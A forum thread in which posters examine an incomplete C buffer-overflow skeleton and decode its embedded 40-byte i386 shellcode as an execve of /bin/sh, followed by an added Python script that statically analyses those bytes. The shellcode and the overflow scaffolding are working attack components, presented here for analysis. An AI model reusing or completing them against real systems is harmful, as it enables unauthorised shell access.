Phr34kn_Phantom

Buffer Overflow

7 posts in this topic

Recently a friend of mine was banned from a game server and the forums. I believe this is the code. I'm pretty sure it's C. He's also been framed for hacking the forums of that community and another's. I know for a fact that he didn't due to his lack of any computer skills whatsoever... Does this code here help his case? Is there anything that can be done on this?

#include <stdio.h>   /* needed for printf */
#include <stdlib.h>

#define DEFAULT_OFFSET 0
#define DEFAULT_BUFFER_SIZE 512
#define NOP 0x90

/* 40 bytes of raw i386 machine code; what it does is discussed further down */
char shellcode[] =
"\xeb\x1a\x5e\x31\xc0\x88\x46\x07\x8d\x1e\x89\x5e\x08\x89\x46"
"\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\xe8\xe1"
"\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68";

/* Returns the current stack pointer by leaving %esp in %eax, the
   return register; only works when compiled as 32-bit x86 code. */
unsigned long get_sp(void) {
    __asm__("movl %esp,%eax");
}

int main(int argc, char *argv[])
{
    char *buff, *ptr;
    long *addr_ptr, addr;
    int offset=DEFAULT_OFFSET, bsize=DEFAULT_BUFFER_SIZE;
    int i;

    if (argc > 1) bsize = atoi(argv[1]);
    if (argc > 2) offset = atoi(argv[2]);

    if (!(buff = malloc(bsize))) {
        printf("Can't allocate memory.\n");
        exit(0);
    }

    /* The posted snippet stops here: buff, ptr, addr, offset and NOP
       are never used, so the program allocates a buffer and exits. */
    return 0;
}


This code isn't anything. First, it's incomplete. Second, it looks like a piece of boilerplate or textbook example buffer overflow code. This most certainly isn't an exploit for anything.

Though I don't know what the payload does. Who wants to run that through a disassembler?

Looks like it does an exec("/bin/sh")

How can you tell?

Looks like it does an exec("/bin/sh")

How can you tell?

http://www.dolcevie.com/js/converter.html

Hex:

eb:1a:5e:31:c0:88:46:07:8d:1e:89:5e:08:89:46:0c:b0:0b:89:f3:8d:4e:08:8d:56:0c:cd:80:e8:e1:ff:ff:ff:2f:62:69:6e:2f:73:68

ASCII:

??^1??F????^??F??????N??V????????/bin/sh

It's not hard to predict that since it's named "shellcode", it's probably supposed to start a shell. I can safely bet that the rest of it is a compiled call to some system exec function, and /bin/sh is the argument.

Also, it's worth mentioning that the quoted piece of code won't do anything besides maybe informing the person who runs it that it couldn't allocate memory.

Edited by WhatChout

Another handy tool is ndisasm, which comes with nasm. Nasm isn't my choice of assembler for various personal reasons, but ndisasm will take straight hex encoded machine code and output the mnemonics for you.

Looks like it does an exec("/bin/sh")

How can you tell?

It's not hard to predict that since it's named "shellcode", it's probably supposed to start a shell. I can safely bet that the rest of it is a compiled call to some system exec function, and /bin/sh is the argument.

To be sure you could check the Intel Software Developer's Manual Volume 2: Instruction Set Reference, Appendix A: Opcode map.

Link: http://developer.intel.com/design/pentium/manuals/243191.htm

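An added triage script (not code from this thread or its posters) that does what the last three replies describe doing by hand: it re-assembles the 40 bytes from the hex dump above, pulls out printable strings, pairs each int 0x80 with the mov al, imm8 that selects the syscall, and resolves the jmp/call targets. The syscall-table subset and the single-byte opcode scans are my own assumptions for a quick look, not a real disassembler like ndisasm.

```python
import re

# Constructed input: the 40 bytes quoted in the thread, re-assembled from the hex dump.
SHELLCODE = bytes.fromhex(
    "eb1a5e31c08846078d1e895e0889460cb00b89f38d4e088d560ccd80e8e1ffffff"
    "2f62696e2f7368"
)
# Assumed subset of the Linux i386 syscall table (number -> name); 11 is execve.
I386_SYSCALLS = {1: "exit", 3: "read", 4: "write", 11: "execve", 102: "socketcall"}

def find_strings(code, min_len=4):
    """Printable ASCII runs of at least min_len bytes (the strings(1) check)."""
    return [m.group().decode("ascii")
            for m in re.finditer(rb"[\x20-\x7e]{%d,}" % min_len, code)]

def find_syscalls(code):
    """Heuristic: pair each 'int 0x80' (cd 80) with the nearest preceding
    'mov al, imm8' (b0 xx). Returns (offset of int 0x80, number, name)."""
    hits = []
    for off in range(len(code) - 1):
        if code[off:off + 2] != b"\xcd\x80":
            continue
        num = None
        for back in range(off - 2, -1, -1):  # walk back to the mov al, imm8
            if code[back] == 0xB0:
                num = code[back + 1]
                break
        hits.append((off, num, I386_SYSCALLS.get(num, "unknown")))
    return hits

def find_branches(code):
    """Heuristic byte scan for 'jmp short rel8' (eb) and 'call rel32' (e8);
    targets are computed relative to the end of the instruction."""
    branches = []
    for off, b in enumerate(code):
        if b == 0xEB and off + 2 <= len(code):
            rel = int.from_bytes(code[off + 1:off + 2], "little", signed=True)
            branches.append((off, "jmp short", off + 2 + rel))
        elif b == 0xE8 and off + 5 <= len(code):
            rel = int.from_bytes(code[off + 1:off + 5], "little", signed=True)
            branches.append((off, "call", off + 5 + rel))
    return branches

def data_after_call(code):
    """Bytes following each call: the classic jmp/call/pop trick places a
    string there so the pushed return address is that string's address."""
    return [code[off + 5:].split(b"\0")[0]
            for off, kind, _ in find_branches(code) if kind == "call"]
```

On this input the jmp at offset 0 lands on the call at offset 28, which jumps back to the pop at offset 2 while pushing offset 33, the start of "/bin/sh"; with al set to 11 before int 0x80 that is an execve, which confirms the guess made in the replies.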
